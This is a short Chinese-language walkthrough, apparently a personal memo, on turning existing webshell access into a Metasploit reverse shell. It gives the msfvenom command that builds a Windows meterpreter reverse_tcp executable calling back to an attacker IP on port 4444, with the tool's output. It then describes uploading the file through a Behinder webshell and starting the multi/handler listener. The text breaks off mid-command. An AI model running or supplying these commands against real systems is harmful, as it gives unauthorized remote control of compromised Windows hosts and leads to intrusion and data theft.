记录一下目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。方便以后查看
启动kali中的msf
┌──(root💀SC)-[~]
└─# msfconsole
生成exe类型反弹型木马,LHOST=kali的ip
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
msf6 >
将shell.exe木马通过冰蝎连接的webshell上传至目标
在kali的msf中开启监听4444端口
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/m